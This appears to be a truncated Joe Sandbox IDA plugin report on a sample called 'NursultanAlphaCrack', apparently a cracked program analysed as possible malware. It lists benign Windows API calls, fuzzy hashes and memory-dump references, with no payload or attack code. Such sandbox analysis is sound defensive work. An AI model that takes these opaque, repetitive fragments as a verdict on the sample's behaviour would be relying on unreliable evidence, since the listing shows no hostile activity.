                                                                                        • Instruction ID: 8e084b16aa12c4a0c80f4c2c30c9fe17e3d39454b6783a444423bd65b98f71aa
                                                                                        • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                        • Instruction Fuzzy Hash: 0A0126722047856BE3318F6A9C8196EFBE8FB85370F25051DE584832C1EB30A806C764
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000008,001F3A34,00000000,?,001E989A,00000001,00000364,?,?,?,001CD984,?,?,?,00000004,001CD710), ref: 001EB177
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: eda94379e1d7cffbea5986b560b72e0c571fa62780e3c75898d950af2a4e2870
                                                                                        • Instruction ID: afa516b8bc5f6cdc4573938ee9b71118a3d1c5243c19320e169098fbee38fde9
                                                                                        • Opcode Fuzzy Hash: eda94379e1d7cffbea5986b560b72e0c571fa62780e3c75898d950af2a4e2870
                                                                                        • Instruction Fuzzy Hash: 47F0E93250DDE5B7EB255B23BD69BAF7748AF51770B198121FC0897190CB20DD0182E0
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 001E3C3F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc
                                                                                        • String ID:
                                                                                        • API String ID: 190572456-0
                                                                                        • Opcode ID: 359e91ab955dcc26edcfc61effd2d001e2a754647ad46d1eab99907840f115f0
                                                                                        • Instruction ID: 9b80f9850f5b9c1120fa96c3324e7be3dbcc2bf866e7bb0afdc73471d3b25fac
                                                                                        • Opcode Fuzzy Hash: 359e91ab955dcc26edcfc61effd2d001e2a754647ad46d1eab99907840f115f0
                                                                                        • Instruction Fuzzy Hash: 36F0EC32200656AFCF164EAAFC0899E7799EF05B217244126FA25E71D0DB31DB20C790
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,001ECA2C,00000000,?,001E6CBE,?,00000008,?,001E91E0,?,?,?), ref: 001E8E38
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 1ae12613bf8cf0cbf887f55d57fed0adb09d089ae964ba4222684b4e3bbe6c9d
                                                                                        • Instruction ID: f0b44f6575554796be6e47a5614c0f5d98653dd0b7123a4be4dd46efd8687b20
                                                                                        • Opcode Fuzzy Hash: 1ae12613bf8cf0cbf887f55d57fed0adb09d089ae964ba4222684b4e3bbe6c9d
                                                                                        • Instruction Fuzzy Hash: 07E0ED31202EE56AEB75276B9D08BAF36899B927B0F160120AC1C97081CF20CC0082E0
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 001C5AC2
                                                                                          • Part of subcall function 001CB505: __EH_prolog.LIBCMT ref: 001CB50A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: fcda34a3bc641a7e3c64e89dbd758782d00969c6684ceacf7439b1011fcb96a3
                                                                                        • Instruction ID: 0bcd80bafd19beddbae193bb9e94e985a2a5cf8a246cfa621d684504f991573b
                                                                                        • Opcode Fuzzy Hash: fcda34a3bc641a7e3c64e89dbd758782d00969c6684ceacf7439b1011fcb96a3
                                                                                        • Instruction Fuzzy Hash: 05018C30810794DAD726E7B8C0427EDFBE49F78304F58848EA45663382CBB46B08D7A2
                                                                                        APIs
                                                                                          • Part of subcall function 001CA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,001CA592,000000FF,?,?), ref: 001CA6C4
                                                                                          • Part of subcall function 001CA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,001CA592,000000FF,?,?), ref: 001CA6F2
                                                                                          • Part of subcall function 001CA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,001CA592,000000FF,?,?), ref: 001CA6FE
                                                                                        • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 001CA598
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$FileFirst$CloseErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 1464966427-0
                                                                                        • Opcode ID: a331f24b382a548c1692d8de147c7cc3eb31e56c4643891b9811bde91c39bf71
                                                                                        • Instruction ID: 2f41e4f50d014d1d75220ce4e3f7241b8617af601f3ef8076c23e1660403b43b
                                                                                        • Opcode Fuzzy Hash: a331f24b382a548c1692d8de147c7cc3eb31e56c4643891b9811bde91c39bf71
                                                                                        • Instruction Fuzzy Hash: 28F05E324087A4AACA2357B48905FDA7B906F3A329F44CA4DF1F952196C36590949B23
                                                                                        APIs
                                                                                        • SetThreadExecutionState.KERNEL32(00000001), ref: 001D0E3D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExecutionStateThread
                                                                                        • String ID:
                                                                                        • API String ID: 2211380416-0
                                                                                        • Opcode ID: d6a9d0e5451024c749cf85e5700d0b79ac2e3ecacc393c1120f2771ed68ea7e8
                                                                                        • Instruction ID: a99861c1e538fb2e217b799b9bc8574838d78e7f6555f8c25befaef6015804a2
                                                                                        • Opcode Fuzzy Hash: d6a9d0e5451024c749cf85e5700d0b79ac2e3ecacc393c1120f2771ed68ea7e8
                                                                                        • Instruction Fuzzy Hash: DED012116111947AEB1233296859BFE26168FFA711F0D006BB585577C3CF544986A261
                                                                                        APIs
                                                                                        • GdipAlloc.GDIPLUS(00000010), ref: 001DA62C
                                                                                          • Part of subcall function 001DA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 001DA3DA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                        • String ID:
                                                                                        • API String ID: 1915507550-0
                                                                                        • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                        • Instruction ID: d23a8cc11120d8f4ae0e55f21e13d6f8d14f3e7e3d713327176f5ab17daa31e5
                                                                                        • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                        • Instruction Fuzzy Hash: 6DD0C971214209BADF46AB61CC1296E7A9AEF11340F448127B842D9391EBF1E910A662
                                                                                        APIs
                                                                                        • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,001D1B3E), ref: 001DDD92
                                                                                          • Part of subcall function 001DB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001DB579
                                                                                          • Part of subcall function 001DB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001DB58A
                                                                                          • Part of subcall function 001DB568: IsDialogMessageW.USER32(00010440,?), ref: 001DB59E
                                                                                          • Part of subcall function 001DB568: TranslateMessage.USER32(?), ref: 001DB5AC
                                                                                          • Part of subcall function 001DB568: DispatchMessageW.USER32(?), ref: 001DB5B6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                        • String ID:
                                                                                        • API String ID: 897784432-0
                                                                                        • Opcode ID: 7da209e74292849d5ad01327562ceae9088e8102ed9ec2d632f1aba09446b5cc
                                                                                        • Instruction ID: 4f12f6464871fb6d720d113cca65c54ab6607647a66cc702b0cabb1e282b9c55
                                                                                        • Opcode Fuzzy Hash: 7da209e74292849d5ad01327562ceae9088e8102ed9ec2d632f1aba09446b5cc
                                                                                        • Instruction Fuzzy Hash: 0DD09E31148300BAD6126B51ED0AF0B7AE2AB98B04F404555B285740B287729D31DF11
                                                                                        APIs
                                                                                        • DloadProtectSection.DELAYIMP ref: 001DE5E3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: DloadProtectSection
                                                                                        • String ID:
                                                                                        • API String ID: 2203082970-0
                                                                                        • Opcode ID: 526bf541e1c9201af3fab9c5a1d25a2b31c03e5b0eca57c8361d8a0ffb6f3c80
                                                                                        • Instruction ID: 6b406d9b0340ac656012a9e8b72eb9289085c6db13495d56b0d9f9d2e9b01df3
                                                                                        • Opcode Fuzzy Hash: 526bf541e1c9201af3fab9c5a1d25a2b31c03e5b0eca57c8361d8a0ffb6f3c80
                                                                                        • Instruction Fuzzy Hash: E8D0A9B8080240AAC312FBE8B88AB1432D0B330B47F800153B204C96A0CB6480A1CA02
                                                                                        APIs
                                                                                        • GetFileType.KERNELBASE(000000FF,001C97BE), ref: 001C98C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileType
                                                                                        • String ID:
                                                                                        • API String ID: 3081899298-0
                                                                                        • Opcode ID: 4dfaa793c5e8699ba6fcf2f975c0c7263573c55cdd5cca91aa6af90f895c06ba
                                                                                        • Instruction ID: 6768075240f0334757e138a5f76d4a2bbae16e0db2643bf72cb90f667f9410df
                                                                                        • Opcode Fuzzy Hash: 4dfaa793c5e8699ba6fcf2f975c0c7263573c55cdd5cca91aa6af90f895c06ba
                                                                                        • Instruction Fuzzy Hash: 8DC0123440028A968E208A24984C9AA7722AB633A67B486D8D0288A0E1C322CC87EA01
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DEAF9
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: 7c956c68a1716a1e9bfc912e2a0c7b71badcfc658c59f925f02991f3558f54ad
                                                                                        • Instruction ID: 2ad6c12305c42669df87385c691a226cf5f2da4ad00a51a934c5f7c76afe5de9
                                                                                        • Opcode Fuzzy Hash: 7c956c68a1716a1e9bfc912e2a0c7b71badcfc658c59f925f02991f3558f54ad
                                                                                        • Instruction Fuzzy Hash: BEB012D73AE4977C3108F2402E02C37015CC0D0BA3330802FF500CC2C1DE801D012471
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE3FC
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: fc32c9f66e43e9531cad712511caeb8050f8ff6e83300a7d9a9e359016416e1e
                                                                                        • Instruction ID: ba9d242d6e518ee23e9eb4647eccd90d9d3e37b1f989665e53ba59617c0364d3
                                                                                        • Opcode Fuzzy Hash: fc32c9f66e43e9531cad712511caeb8050f8ff6e83300a7d9a9e359016416e1e
                                                                                        • Instruction Fuzzy Hash: 9BB012E33AC0547C3108B1442E02C37029CD4C0B22330C02FF608D9380DA401D092473
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE3FC
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: eb2e2249eaab6afded1b27e100af6eee9c4a6854a0a327316e2a5b8fcb56f56e
                                                                                        • Instruction ID: 5e4814f7c2407bed36b73f598f8eb3860dcc26f49328fccff699bc4bb240903f
                                                                                        • Opcode Fuzzy Hash: eb2e2249eaab6afded1b27e100af6eee9c4a6854a0a327316e2a5b8fcb56f56e
                                                                                        • Instruction Fuzzy Hash: D6B012F22AC054BC3108F1442D02C37029CC5C0F32330802FF908C9380DA445F002473
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE3FC
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: 79ffe904eb35cb7c71f78172d11e3c404543f974eba537326890c37977623c9f
                                                                                        • Instruction ID: 601be51d8053df137409a29c5f6cb0c7d5553ab845569ad60ad2cffa70149f98
                                                                                        • Opcode Fuzzy Hash: 79ffe904eb35cb7c71f78172d11e3c404543f974eba537326890c37977623c9f
                                                                                        • Instruction Fuzzy Hash: AAB012E32AC054BC3108F1442D02C37029CD5C0B22330C02FF908C9380DA405D042473
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE51F
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: cd5ee481adef92bfaad209bc51bde6b600c57bd38b12962cf9fcb285be551ff5
                                                                                        • Instruction ID: aa3a03f147aa178d96aadd87f65c1f7b08025eca0e6a784c139fbce560b436af
                                                                                        • Opcode Fuzzy Hash: cd5ee481adef92bfaad209bc51bde6b600c57bd38b12962cf9fcb285be551ff5
                                                                                        • Instruction Fuzzy Hash: 45B012C526C0457C710871643D06C3B014CC0E1F22330413FF410CC681AA405E043471
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE51F
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
